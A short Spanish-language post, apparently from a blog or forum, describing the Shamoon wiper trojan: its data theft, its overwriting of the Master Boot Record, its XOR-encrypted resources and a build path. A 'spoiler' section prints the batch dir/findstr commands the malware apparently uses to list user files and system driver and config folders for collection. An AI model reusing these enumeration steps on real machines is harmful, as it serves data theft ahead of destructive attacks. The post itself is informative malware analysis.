Como lo ves esta imagen es una parte de un troyano desensamblado con algo de ingeniería inversa, este malware en particular se llama Shamoon y afecta a computadoras con OS Windows.
En si este código busca información confidencial sobre la victima dentro de la PC como puede ser números de cuentas bancarias, llaves de acceso a sistemas, firmas digitales y demás datos sensibles, lo intrigante de este programa es que una ves terminado su trabajo, borra archivos propios del sistema para desablitar el sistema y uno de ellos es "Master Boot Record" o boot maestro. haciendo que la PC no vuelva a iniciar.
-Spolier- (datos muy técnicos)
Shamoon es un archivo PE de 900KB con varios recursos encriptados, como son los recursos 112, 113, 116 encriptados con operaciones de 4 byte tipo XOR
El troyano se puede encontrar en esta dirección.
C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb
Y los archivos que colecciona este programa son.
dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf
dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf
dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf
dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf
dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf
dir f1.inf /s /b 2>nul >>f1.inf
dir f2.inf /s /b 2>nul >>f1.inf
entre otros.
-Fin del Spolier-
Todos estos datos soy meramente infomativo, el troyano en cuestión al parecer solo ataca a infraestructuras de empresas no reveladas y no a usuarios finales del sistema operativo Windows.
Gracias: www.slashgear.com
